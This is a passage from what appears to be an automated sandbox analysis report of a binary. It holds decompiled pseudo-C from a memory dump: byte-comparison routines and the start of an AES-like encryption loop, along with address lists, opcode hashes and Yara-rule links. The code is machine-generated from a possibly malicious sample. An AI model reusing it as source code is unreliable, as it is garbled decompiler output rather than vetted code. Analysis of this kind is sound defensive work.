										_t286 = ( *(_t313 - 8) & 0x000000ff) - ( *(_t275 - 8) & 0x000000ff);
										if(_t286 == 0) {
											L61:
											_t288 = ( *(_t313 - 7) & 0x000000ff) - ( *(_t275 - 7) & 0x000000ff);
											if(_t288 == 0) {
												L63:
												_t231 = ( *(_t313 - 6) & 0x000000ff) - ( *(_t275 - 6) & 0x000000ff);
												if(_t231 != 0) {
													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
												}
												goto L66;
											}
											_t231 = (0 | _t288 > 0x00000000) * 2 - 1;
											if(_t231 != 0) {
												goto L1;
											}
											goto L63;
										}
										_t231 = (0 | _t286 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L61;
									}
									_t231 = (0 | _t284 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L59;
								}
								_t290 = (_t188 & 0x000000ff) - ( *(_t275 - 0xd) & 0x000000ff);
								if(_t290 == 0) {
									L48:
									_t292 = ( *(_t313 - 0xc) & 0x000000ff) - ( *(_t275 - 0xc) & 0x000000ff);
									if(_t292 == 0) {
										L50:
										_t294 = ( *(_t313 - 0xb) & 0x000000ff) - ( *(_t275 - 0xb) & 0x000000ff);
										if(_t294 == 0) {
											L52:
											_t231 = ( *(_t313 - 0xa) & 0x000000ff) - ( *(_t275 - 0xa) & 0x000000ff);
											if(_t231 != 0) {
												_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
											}
											goto L55;
										}
										_t231 = (0 | _t294 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L52;
									}
									_t231 = (0 | _t292 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L50;
								}
								_t231 = (0 | _t290 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L48;
							}
							_t296 = (_t187 & 0x000000ff) - ( *(_t275 - 0x11) & 0x000000ff);
							if(_t296 == 0) {
								L37:
								_t298 = ( *(_t313 - 0x10) & 0x000000ff) - ( *(_t275 - 0x10) & 0x000000ff);
								if(_t298 == 0) {
									L39:
									_t300 = ( *(_t313 - 0xf) & 0x000000ff) - ( *(_t275 - 0xf) & 0x000000ff);
									if(_t300 == 0) {
										L41:
										_t231 = ( *(_t313 - 0xe) & 0x000000ff) - ( *(_t275 - 0xe) & 0x000000ff);
										if(_t231 != 0) {
											_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
										}
										goto L44;
									}
									_t231 = (0 | _t300 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L41;
								}
								_t231 = (0 | _t298 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L39;
							}
							_t231 = (0 | _t296 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L37;
						}
						_t302 = (_t186 & 0x000000ff) - ( *(_t275 - 0x15) & 0x000000ff);
						if(_t302 == 0) {
							L26:
							_t304 = ( *(_t313 - 0x14) & 0x000000ff) - ( *(_t275 - 0x14) & 0x000000ff);
							if(_t304 == 0) {
								L28:
								_t306 = ( *(_t313 - 0x13) & 0x000000ff) - ( *(_t275 - 0x13) & 0x000000ff);
								if(_t306 == 0) {
									L30:
									_t231 = ( *(_t313 - 0x12) & 0x000000ff) - ( *(_t275 - 0x12) & 0x000000ff);
									if(_t231 != 0) {
										_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
									}
									goto L33;
								}
								_t231 = (0 | _t306 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L30;
							}
							_t231 = (0 | _t304 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L28;
						}
						_t231 = (0 | _t302 > 0x00000000) * 2 - 1;
						if(_t231 != 0) {
							goto L1;
						}
						goto L26;
					}
					_t308 = (_t185 & 0x000000ff) - ( *(_t275 - 0x19) & 0x000000ff);
					if(_t308 == 0) {
						L15:
						_t310 = ( *(_t313 - 0x18) & 0x000000ff) - ( *(_t275 - 0x18) & 0x000000ff);
						if(_t310 == 0) {
							L17:
							_t312 = ( *(_t313 - 0x17) & 0x000000ff) - ( *(_t275 - 0x17) & 0x000000ff);
							if(_t312 == 0) {
								L19:
								_t231 = ( *(_t313 - 0x16) & 0x000000ff) - ( *(_t275 - 0x16) & 0x000000ff);
								if(_t231 != 0) {
									_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
								}
								goto L22;
							}
							_t231 = (0 | _t312 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L19;
						}
						_t231 = (0 | _t310 > 0x00000000) * 2 - 1;
						if(_t231 != 0) {
							goto L1;
						}
						goto L17;
					}
					_t231 = (0 | _t308 > 0x00000000) * 2 - 1;
					if(_t231 != 0) {
						goto L1;
					}
					goto L15;
				} else {
					__edi = __al & 0x000000ff;
					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
					if(__edi == 0) {
						L4:
						__edi =  *(__esi - 0x1c) & 0x000000ff;
						__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
						if(__edi == 0) {
							L6:
							__edi =  *(__esi - 0x1b) & 0x000000ff;
							__edi = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
							if(__edi == 0) {
								L8:
								__ecx =  *(__esi - 0x1a) & 0x000000ff;
								__ecx = ( *(__esi - 0x1a) & 0x000000ff) - ( *(__edx - 0x1a) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L11;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								goto L1;
							}
							goto L8;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L1;
						}
						goto L6;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L1;
					}
					goto L4;
				}
				L1:
				_t184 = _t231;
				return _t184;
			}






























          0x0020fcde
          0x0020fcde
          0x0020fce4
          0x0020fd5b
          0x0020fd5d
          0x0020fd5f
          0x00000000
          0x00000000
          0x0020fd65
          0x0020fd6b
          0x0020fdf2
          0x0020fdf4
          0x0020fdf6
          0x00000000
          0x00000000
          0x0020fdfc
          0x0020fe02
          0x0020fe89
          0x0020fe8b
          0x0020fe8d
          0x00000000
          0x00000000
          0x0020fe93
          0x0020fe99
          0x0020ff20
          0x0020ff22
          0x0020ff24
          0x00000000
          0x00000000
          0x0020ff2a
          0x0020ff30
          0x0020ffb7
          0x0020ffb9
          0x0020ffbb
          0x00000000
          0x00000000
          0x0020ffc7
          0x0021004f
          0x00210051
          0x00210053
          0x00000000
          0x00000000
          0x00210059
          0x0021005f
          0x002100e6
          0x002100e8
          0x002100ea
          0x002100f8
          0x002100fa
          0x00210107
          0x00210107
          0x002100fa
          0x00000000
          0x002100ea
          0x0021006c
          0x0021006e
          0x00210086
          0x0021008e
          0x00210090
          0x002100a8
          0x002100b0
          0x002100b2
          0x002100ca
          0x002100d2
          0x002100d4
          0x002100dd
          0x002100dd
          0x00000000
          0x002100d4
          0x002100bb
          0x002100c4
          0x00000000
          0x00000000
          0x00000000
          0x002100c4
          0x00210099
          0x002100a2
          0x00000000
          0x00000000
          0x00000000
          0x002100a2
          0x00210077
          0x00210080
          0x00000000
          0x00000000
          0x00000000
          0x00210080
          0x0020ffd5
          0x0020ffd7
          0x0020ffef
          0x0020fff7
          0x0020fff9
          0x00210011
          0x00210019
          0x0021001b
          0x00210033
          0x0021003b
          0x0021003d
          0x00210046
          0x00210046
          0x00000000
          0x0021003d
          0x00210024
          0x0021002d
          0x00000000
          0x00000000
          0x00000000
          0x0021002d
          0x00210002
          0x0021000b
          0x00000000
          0x00000000
          0x00000000
          0x0021000b
          0x0020ffe0
          0x0020ffe9
          0x00000000
          0x00000000
          0x00000000
          0x0020ffe9
          0x0020ff3d
          0x0020ff3f
          0x0020ff57
          0x0020ff5f
          0x0020ff61
          0x0020ff79
          0x0020ff81
          0x0020ff83
          0x0020ff9b
          0x0020ffa3
          0x0020ffa5
          0x0020ffae
          0x0020ffae
          0x00000000
          0x0020ffa5
          0x0020ff8c
          0x0020ff95
          0x00000000
          0x00000000
          0x00000000
          0x0020ff95
          0x0020ff6a
          0x0020ff73
          0x00000000
          0x00000000
          0x00000000
          0x0020ff73
          0x0020ff48
          0x0020ff51
          0x00000000
          0x00000000
          0x00000000
          0x0020ff51
          0x0020fea6
          0x0020fea8
          0x0020fec0
          0x0020fec8
          0x0020feca
          0x0020fee2
          0x0020feea
          0x0020feec
          0x0020ff04
          0x0020ff0c
          0x0020ff0e
          0x0020ff17
          0x0020ff17
          0x00000000
          0x0020ff0e
          0x0020fef5
          0x0020fefe
          0x00000000
          0x00000000
          0x00000000
          0x0020fefe
          0x0020fed3
          0x0020fedc
          0x00000000
          0x00000000
          0x00000000
          0x0020fedc
          0x0020feb1
          0x0020feba
          0x00000000
          0x00000000
          0x00000000
          0x0020feba
          0x0020fe0f
          0x0020fe11
          0x0020fe29
          0x0020fe31
          0x0020fe33
          0x0020fe4b
          0x0020fe53
          0x0020fe55
          0x0020fe6d
          0x0020fe75
          0x0020fe77
          0x0020fe80
          0x0020fe80
          0x00000000
          0x0020fe77
          0x0020fe5e
          0x0020fe67
          0x00000000
          0x00000000
          0x00000000
          0x0020fe67
          0x0020fe3c
          0x0020fe45
          0x00000000
          0x00000000
          0x00000000
          0x0020fe45
          0x0020fe1a
          0x0020fe23
          0x00000000
          0x00000000
          0x00000000
          0x0020fe23
          0x0020fd78
          0x0020fd7a
          0x0020fd92
          0x0020fd9a
          0x0020fd9c
          0x0020fdb4
          0x0020fdbc
          0x0020fdbe
          0x0020fdd6
          0x0020fdde
          0x0020fde0
          0x0020fde9
          0x0020fde9
          0x00000000
          0x0020fde0
          0x0020fdc7
          0x0020fdd0
          0x00000000
          0x00000000
          0x00000000
          0x0020fdd0
          0x0020fda5
          0x0020fdae
          0x00000000
          0x00000000
          0x00000000
          0x0020fdae
          0x0020fd83
          0x0020fd8c
          0x00000000
          0x00000000
          0x00000000
          0x0020fce6
          0x0020fce6
          0x0020fced
          0x0020fcef
          0x0020fd03
          0x0020fd03
          0x0020fd0b
          0x0020fd0d
          0x0020fd21
          0x0020fd21
          0x0020fd29
          0x0020fd2b
          0x0020fd3f
          0x0020fd3f
          0x0020fd47
          0x0020fd49
          0x0020fd52
          0x0020fd52
          0x00000000
          0x0020fd49
          0x0020fd31
          0x0020fd34
          0x0020fd3d
          0x00000000
          0x00000000
          0x00000000
          0x0020fd3d
          0x0020fd13
          0x0020fd16
          0x0020fd1f
          0x00000000
          0x00000000
          0x00000000
          0x0020fd1f
          0x0020fcf5
          0x0020fcf8
          0x0020fd01
          0x00000000
          0x00000000
          0x00000000
          0x0020fd01
          0x0020fcd6
          0x0020fcd6
          0x00210ac7

          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
          • Instruction ID: 6aeaa0befad951c6b7e4dc199060da7556381169cd062a490e243ad4f03b7407
          • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
          • Instruction Fuzzy Hash: FDC1E9732552570AEFBD8A39C67403EBAA05AA27B131A037ED8B2CB8C6FE50C574D510
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0020F8C6, Relevance: .3, Instructions: 323COMMONCrypto
          Download Yara Rule
          C-Code - Quality: 100%
          			E0020F8C6(void* __edx, void* __esi) {
				signed char _t177;
				void* _t178;
				signed char _t179;
				signed char _t180;
				signed char _t181;
				signed char _t183;
				signed char _t184;
				void* _t228;
				void* _t278;
				void* _t281;
				void* _t283;
				void* _t285;
				void* _t287;
				void* _t289;
				void* _t291;
				void* _t293;
				void* _t295;
				void* _t297;
				void* _t299;
				void* _t301;
				void* _t303;
				void* _t305;
				void* _t307;
				void* _t309;
				void* _t311;
				void* _t313;
				void* _t315;
				void* _t317;
				void* _t319;
				void* _t321;
				void* _t322;

				_t322 = __esi;
				_t278 = __edx;
				_t177 =  *(__esi - 0x1c);
				if(_t177 ==  *(__edx - 0x1c)) {
					_t228 = 0;
					L10:
					if(_t228 != 0) {
						L78:
						_t178 = _t228;
						return _t178;
					}
					_t179 =  *(_t322 - 0x18);
					if(_t179 ==  *(_t278 - 0x18)) {
						_t228 = 0;
						L21:
						if(_t228 != 0) {
							goto L78;
						}
						_t180 =  *(_t322 - 0x14);
						if(_t180 ==  *(_t278 - 0x14)) {
							_t228 = 0;
							L32:
							if(_t228 != 0) {
								goto L78;
							}
							_t181 =  *(_t322 - 0x10);
							if(_t181 ==  *(_t278 - 0x10)) {
								_t228 = 0;
								L43:
								if(_t228 != 0) {
									goto L78;
								}
								if( *(_t322 - 0xc) ==  *(_t278 - 0xc)) {
									_t228 = 0;
									L54:
									if(_t228 != 0) {
										goto L78;
									}
									_t183 =  *(_t322 - 8);
									if(_t183 ==  *(_t278 - 8)) {
										_t228 = 0;
										L65:
										if(_t228 != 0) {
											goto L78;
										}
										_t184 =  *(_t322 - 4);
										if(_t184 ==  *(_t278 - 4)) {
											_t228 = 0;
											L76:
											if(_t228 == 0) {
												_t228 = 0;
											}
											goto L78;
										}
										_t281 = (_t184 & 0x000000ff) - ( *(_t278 - 4) & 0x000000ff);
										if(_t281 == 0) {
											L69:
											_t283 = ( *(_t322 - 3) & 0x000000ff) - ( *(_t278 - 3) & 0x000000ff);
											if(_t283 == 0) {
												L71:
												_t285 = ( *(_t322 - 2) & 0x000000ff) - ( *(_t278 - 2) & 0x000000ff);
												if(_t285 == 0) {
													L73:
													_t228 = ( *(_t322 - 1) & 0x000000ff) - ( *(_t278 - 1) & 0x000000ff);
													if(_t228 != 0) {
														_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
													}
													goto L76;
												}
												_t228 = (0 | _t285 > 0x00000000) * 2 - 1;
												if(_t228 != 0) {
													goto L78;
												}
												goto L73;
											}
											_t228 = (0 | _t283 > 0x00000000) * 2 - 1;
											if(_t228 != 0) {
												goto L78;
											}
											goto L71;
										}
										_t228 = (0 | _t281 > 0x00000000) * 2 - 1;
										if(_t228 != 0) {
											goto L78;
										}
										goto L69;
									}
									_t287 = (_t183 & 0x000000ff) - ( *(_t278 - 8) & 0x000000ff);
									if(_t287 == 0) {
										L58:
										_t289 = ( *(_t322 - 7) & 0x000000ff) - ( *(_t278 - 7) & 0x000000ff);
										if(_t289 == 0) {
											L60:
											_t291 = ( *(_t322 - 6) & 0x000000ff) - ( *(_t278 - 6) & 0x000000ff);
											if(_t291 == 0) {
												L62:
												_t228 = ( *(_t322 - 5) & 0x000000ff) - ( *(_t278 - 5) & 0x000000ff);
												if(_t228 != 0) {
													_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
												}
												goto L65;
											}
											_t228 = (0 | _t291 > 0x00000000) * 2 - 1;
											if(_t228 != 0) {
												goto L78;
											}
											goto L62;
										}
										_t228 = (0 | _t289 > 0x00000000) * 2 - 1;
										if(_t228 != 0) {
											goto L78;
										}
										goto L60;
									}
									_t228 = (0 | _t287 > 0x00000000) * 2 - 1;
									if(_t228 != 0) {
										goto L78;
									}
									goto L58;
								}
								_t293 = ( *(_t322 - 0xc) & 0x000000ff) - ( *(_t278 - 0xc) & 0x000000ff);
								if(_t293 == 0) {
									L47:
									_t295 = ( *(_t322 - 0xb) & 0x000000ff) - ( *(_t278 - 0xb) & 0x000000ff);
									if(_t295 == 0) {
										L49:
										_t297 = ( *(_t322 - 0xa) & 0x000000ff) - ( *(_t278 - 0xa) & 0x000000ff);
										if(_t297 == 0) {
											L51:
											_t228 = ( *(_t322 - 9) & 0x000000ff) - ( *(_t278 - 9) & 0x000000ff);
											if(_t228 != 0) {
												_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
											}
											goto L54;
										}
										_t228 = (0 | _t297 > 0x00000000) * 2 - 1;
										if(_t228 != 0) {
											goto L78;
										}
										goto L51;
									}
									_t228 = (0 | _t295 > 0x00000000) * 2 - 1;
									if(_t228 != 0) {
										goto L78;
									}
									goto L49;
								}
								_t228 = (0 | _t293 > 0x00000000) * 2 - 1;
								if(_t228 != 0) {
									goto L78;
								}
								goto L47;
							}
							_t299 = (_t181 & 0x000000ff) - ( *(_t278 - 0x10) & 0x000000ff);
							if(_t299 == 0) {
								L36:
								_t301 = ( *(_t322 - 0xf) & 0x000000ff) - ( *(_t278 - 0xf) & 0x000000ff);
								if(_t301 == 0) {
									L38:
									_t303 = ( *(_t322 - 0xe) & 0x000000ff) - ( *(_t278 - 0xe) & 0x000000ff);
									if(_t303 == 0) {
										L40:
										_t228 = ( *(_t322 - 0xd) & 0x000000ff) - ( *(_t278 - 0xd) & 0x000000ff);
										if(_t228 != 0) {
											_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
										}
										goto L43;
									}
									_t228 = (0 | _t303 > 0x00000000) * 2 - 1;
									if(_t228 != 0) {
										goto L78;
									}
									goto L40;
								}
								_t228 = (0 | _t301 > 0x00000000) * 2 - 1;
								if(_t228 != 0) {
									goto L78;
								}
								goto L38;
							}
							_t228 = (0 | _t299 > 0x00000000) * 2 - 1;
							if(_t228 != 0) {
								goto L78;
							}
							goto L36;
						}
						_t305 = (_t180 & 0x000000ff) - ( *(_t278 - 0x14) & 0x000000ff);
						if(_t305 == 0) {
							L25:
							_t307 = ( *(_t322 - 0x13) & 0x000000ff) - ( *(_t278 - 0x13) & 0x000000ff);
							if(_t307 == 0) {
								L27:
								_t309 = ( *(_t322 - 0x12) & 0x000000ff) - ( *(_t278 - 0x12) & 0x000000ff);
								if(_t309 == 0) {
									L29:
									_t228 = ( *(_t322 - 0x11) & 0x000000ff) - ( *(_t278 - 0x11) & 0x000000ff);
									if(_t228 != 0) {
										_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
									}
									goto L32;
								}
								_t228 = (0 | _t309 > 0x00000000) * 2 - 1;
								if(_t228 != 0) {
									goto L78;
								}
								goto L29;
							}
							_t228 = (0 | _t307 > 0x00000000) * 2 - 1;
							if(_t228 != 0) {
								goto L78;
							}
							goto L27;
						}
						_t228 = (0 | _t305 > 0x00000000) * 2 - 1;
						if(_t228 != 0) {
							goto L78;
						}
						goto L25;
					}
					_t311 = (_t179 & 0x000000ff) - ( *(_t278 - 0x18) & 0x000000ff);
					if(_t311 == 0) {
						L14:
						_t313 = ( *(_t322 - 0x17) & 0x000000ff) - ( *(_t278 - 0x17) & 0x000000ff);
						if(_t313 == 0) {
							L16:
							_t315 = ( *(_t322 - 0x16) & 0x000000ff) - ( *(_t278 - 0x16) & 0x000000ff);
							if(_t315 == 0) {
								L18:
								_t228 = ( *(_t322 - 0x15) & 0x000000ff) - ( *(_t278 - 0x15) & 0x000000ff);
								if(_t228 != 0) {
									_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
								}
								goto L21;
							}
							_t228 = (0 | _t315 > 0x00000000) * 2 - 1;
							if(_t228 != 0) {
								goto L78;
							}
							goto L18;
						}
						_t228 = (0 | _t313 > 0x00000000) * 2 - 1;
						if(_t228 != 0) {
							goto L78;
						}
						goto L16;
					}
					_t228 = (0 | _t311 > 0x00000000) * 2 - 1;
					if(_t228 != 0) {
						goto L78;
					}
					goto L14;
				}
				_t317 = (_t177 & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
				if(_t317 == 0) {
					L3:
					_t319 = ( *(_t322 - 0x1b) & 0x000000ff) - ( *(_t278 - 0x1b) & 0x000000ff);
					if(_t319 == 0) {
						L5:
						_t321 = ( *(_t322 - 0x1a) & 0x000000ff) - ( *(_t278 - 0x1a) & 0x000000ff);
						if(_t321 == 0) {
							L7:
							_t228 = ( *(_t322 - 0x19) & 0x000000ff) - ( *(_t278 - 0x19) & 0x000000ff);
							if(_t228 != 0) {
								_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
							}
							goto L10;
						}
						_t228 = (0 | _t321 > 0x00000000) * 2 - 1;
						if(_t228 != 0) {
							goto L78;
						}
						goto L7;
					}
					_t228 = (0 | _t319 > 0x00000000) * 2 - 1;
					if(_t228 != 0) {
						goto L78;
					}
					goto L5;
				}
				_t228 = (0 | _t317 > 0x00000000) * 2 - 1;
				if(_t228 != 0) {
					goto L78;
				}
				goto L3;
			}


































          0x0020f8c6
          0x0020f8c6
          0x0020f8c6
          0x0020f8cc
          0x0020f953
          0x0020f955
          0x0020f957
          0x0020fcd6
          0x0020fcd6
          0x00210ac7
          0x00210ac7
          0x0020f95d
          0x0020f963
          0x0020f9ea
          0x0020f9ec
          0x0020f9ee
          0x00000000
          0x00000000
          0x0020f9f4
          0x0020f9fa
          0x0020fa81
          0x0020fa83
          0x0020fa85
          0x00000000
          0x00000000
          0x0020fa8b
          0x0020fa91
          0x0020fb18
          0x0020fb1a
          0x0020fb1c
          0x00000000
          0x00000000
          0x0020fb28
          0x0020fbb0
          0x0020fbb2
          0x0020fbb4
          0x00000000
          0x00000000
          0x0020fbba
          0x0020fbc0
          0x0020fc47
          0x0020fc49
          0x0020fc4b
          0x00000000
          0x00000000
          0x0020fc51
          0x0020fc57
          0x0020fcce
          0x0020fcd0
          0x0020fcd2
          0x0020fcd4
          0x0020fcd4
          0x00000000
          0x0020fcd2
          0x0020fc60
          0x0020fc62
          0x0020fc76
          0x0020fc7e
          0x0020fc80
          0x0020fc94
          0x0020fc9c
          0x0020fc9e
          0x0020fcb2
          0x0020fcba
          0x0020fcbc
          0x0020fcc5
          0x0020fcc5
          0x00000000
          0x0020fcbc
          0x0020fca7
          0x0020fcb0
          0x00000000
          0x00000000
          0x00000000
          0x0020fcb0
          0x0020fc89
          0x0020fc92
          0x00000000
          0x00000000
          0x00000000
          0x0020fc92
          0x0020fc6b
          0x0020fc74
          0x00000000
          0x00000000
          0x00000000
          0x0020fc74
          0x0020fbcd
          0x0020fbcf
          0x0020fbe7
          0x0020fbef
          0x0020fbf1
          0x0020fc09
          0x0020fc11
          0x0020fc13
          0x0020fc2b
          0x0020fc33
          0x0020fc35
          0x0020fc3e
          0x0020fc3e
          0x00000000
          0x0020fc35
          0x0020fc1c
          0x0020fc25
          0x00000000
          0x00000000
          0x00000000
          0x0020fc25
          0x0020fbfa
          0x0020fc03
          0x00000000
          0x00000000
          0x00000000
          0x0020fc03
          0x0020fbd8
          0x0020fbe1
          0x00000000
          0x00000000
          0x00000000
          0x0020fbe1
          0x0020fb36
          0x0020fb38
          0x0020fb50
          0x0020fb58
          0x0020fb5a
          0x0020fb72
          0x0020fb7a
          0x0020fb7c
          0x0020fb94
          0x0020fb9c
          0x0020fb9e
          0x0020fba7
          0x0020fba7
          0x00000000
          0x0020fb9e
          0x0020fb85
          0x0020fb8e
          0x00000000
          0x00000000
          0x00000000
          0x0020fb8e
          0x0020fb63
          0x0020fb6c
          0x00000000
          0x00000000
          0x00000000
          0x0020fb6c
          0x0020fb41
          0x0020fb4a
          0x00000000
          0x00000000
          0x00000000
          0x0020fb4a
          0x0020fa9e
          0x0020faa0
          0x0020fab8
          0x0020fac0
          0x0020fac2
          0x0020fada
          0x0020fae2
          0x0020fae4
          0x0020fafc
          0x0020fb04
          0x0020fb06
          0x0020fb0f
          0x0020fb0f
          0x00000000
          0x0020fb06
          0x0020faed
          0x0020faf6
          0x00000000
          0x00000000
          0x00000000
          0x0020faf6
          0x0020facb
          0x0020fad4
          0x00000000
          0x00000000
          0x00000000
          0x0020fad4
          0x0020faa9
          0x0020fab2
          0x00000000
          0x00000000
          0x00000000
          0x0020fab2
          0x0020fa07
          0x0020fa09
          0x0020fa21
          0x0020fa29
          0x0020fa2b
          0x0020fa43
          0x0020fa4b
          0x0020fa4d
          0x0020fa65
          0x0020fa6d
          0x0020fa6f
          0x0020fa78
          0x0020fa78
          0x00000000
          0x0020fa6f
          0x0020fa56
          0x0020fa5f
          0x00000000
          0x00000000
          0x00000000
          0x0020fa5f
          0x0020fa34
          0x0020fa3d
          0x00000000
          0x00000000
          0x00000000
          0x0020fa3d
          0x0020fa12
          0x0020fa1b
          0x00000000
          0x00000000
          0x00000000
          0x0020fa1b
          0x0020f970
          0x0020f972
          0x0020f98a
          0x0020f992
          0x0020f994
          0x0020f9ac
          0x0020f9b4
          0x0020f9b6
          0x0020f9ce
          0x0020f9d6
          0x0020f9d8
          0x0020f9e1
          0x0020f9e1
          0x00000000
          0x0020f9d8
          0x0020f9bf
          0x0020f9c8
          0x00000000
          0x00000000
          0x00000000
          0x0020f9c8
          0x0020f99d
          0x0020f9a6
          0x00000000
          0x00000000
          0x00000000
          0x0020f9a6
          0x0020f97b
          0x0020f984
          0x00000000
          0x00000000
          0x00000000
          0x0020f984
          0x0020f8d9
          0x0020f8db
          0x0020f8f3
          0x0020f8fb
          0x0020f8fd
          0x0020f915
          0x0020f91d
          0x0020f91f
          0x0020f937
          0x0020f93f
          0x0020f941
          0x0020f94a
          0x0020f94a
          0x00000000
          0x0020f941
          0x0020f928
          0x0020f931
          0x00000000
          0x00000000
          0x00000000
          0x0020f931
          0x0020f906
          0x0020f90f
          0x00000000
          0x00000000
          0x00000000
          0x0020f90f
          0x0020f8e4
          0x0020f8ed
          0x00000000
          0x00000000
          0x00000000

          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
          • Instruction ID: 78f95c3b1431c769ab093f5c02bd1a636905ca7e0cf5ecfc95dfab4892d374ec
          • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
          • Instruction Fuzzy Hash: 5AC1C9732552570AEFBD8A39C63113EBAA16AA17B131A077ED8B3CB9C6FE10C534D510
          Uniqueness

          Uniqueness Score: -1.00%

          Function 001FDF12, Relevance: .3, Instructions: 318COMMONCrypto
          Download Yara Rule
          C-Code - Quality: 100%
          			E001FDF12(void* __ebx, intOrPtr __ecx, void* __esi) {
				void* _t222;
				signed int _t229;
				signed char _t253;
				signed int _t301;
				signed int* _t304;
				signed int* _t309;
				unsigned int _t313;
				signed char _t348;
				unsigned int _t350;
				signed int _t353;
				unsigned int _t356;
				signed int* _t359;
				signed int _t363;
				signed int _t368;
				signed int _t372;
				signed int _t376;
				signed char _t378;
				signed int* _t382;
				signed int _t388;
				signed int _t394;
				signed int _t399;
				intOrPtr _t400;
				signed char _t402;
				signed char _t403;
				signed char _t404;
				unsigned int _t406;
				signed int _t409;
				signed int _t411;
				unsigned int _t412;
				unsigned int _t414;
				unsigned int _t415;
				signed int _t416;
				signed int _t421;
				void* _t422;
				unsigned int _t423;
				signed int _t426;
				intOrPtr _t429;
				signed int* _t430;
				void* _t431;
				void* _t432;

				_t414 =  *(_t431 + 0x64);
				_t429 = __ecx;
				 *((intOrPtr*)(_t431 + 0x1c)) = __ecx;
				if(_t414 != 0) {
					_t415 = _t414 >> 4;
					 *(_t431 + 0x64) = _t415;
					if( *((char*)(__ecx)) == 0) {
						 *((intOrPtr*)(_t431 + 0x30)) = __ecx + 8;
						E0020EA80(_t431 + 0x54, __ecx + 8, 0x10);
						_t432 = _t431 + 0xc;
						if(_t415 == 0) {
							L13:
							return E0020EA80( *((intOrPtr*)(_t432 + 0x30)), _t432 + 0x50, 0x10);
						}
						_t399 =  *(_t432 + 0x60);
						 *(_t432 + 0x1c) = _t399 + 8;
						_t229 =  *(_t432 + 0x70);
						_t400 = _t399 - _t229;
						 *((intOrPtr*)(_t432 + 0x2c)) = _t400;
						_t359 = _t229 + 8;
						 *(_t432 + 0x20) = _t359;
						do {
							_t421 =  *(_t429 + 4);
							 *(_t432 + 0x28) = _t359 + _t400 + 0xfffffff8;
							E001FDEDF(_t432 + 0x4c, _t359 + _t400 + 0xfffffff8, (_t421 << 4) + 0x18 + _t429);
							_t402 =  *(_t432 + 0x44);
							 *(_t432 + 0x68) =  *(0x235350 + (_t402 & 0x000000ff) * 4) ^  *(0x235f50 + ( *(_t432 + 0x4b) & 0x000000ff) * 4) ^  *(0x235b50 + ( *(_t432 + 0x4e) & 0x000000ff) * 4);
							_t348 =  *(_t432 + 0x50);
